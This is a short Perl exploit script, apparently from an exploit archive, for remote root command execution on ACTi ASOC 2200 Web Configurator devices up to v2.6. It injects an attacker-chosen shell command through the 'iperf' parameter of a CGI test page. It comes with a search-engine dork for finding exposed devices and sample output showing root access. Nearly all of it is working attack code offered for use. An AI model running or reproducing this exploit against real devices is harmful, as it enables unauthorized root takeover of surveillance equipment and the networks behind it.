#!perl #ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution ## #Dicovery & Author: Todor Donev #Author mail: todor.donev@@gmail.com #Type: Hardware #Vuln Type and Risk: Remote / High ## #ACTi Corporation is the technology leader in IP surveillance, #focusing on multiple security surveillance market segments. ## #root@linux:~# perl actiroot.pl <CENSORED> #[+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution #[+] Gewgl: intitle:"Web Configurator - Version v2.6" ## id # execute : /sbin/iperf -c ;id& # uid=0(root) gid=0(root)### Got Root ? o.O ## #Special kind regards to Tsvetelina Emirska that support me !! :) # #Prayers to all the People in Japan from Bulgaria !!!!! # use LWP::Simple; print "[+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution\n"; print "[+] Gewgl: intitle:\"Web Configurator - Version v2.6\"\n"; $host = $ARGV[0]; $cmd = $ARGV[1]; if(! $ARGV[0]) { print "[+] usage: perl actiroot.pl <host> <cmd>\n"; exit; } if(! $ARGV[1]) { $cmd = "id"; } my $result = get("http://$host/cgi-bin/test?iperf=;$cmd &"); if (defined $result) { print "# $cmd\n $result"; } else { print "[-] Not Vulnerable\n"; }
体验盒子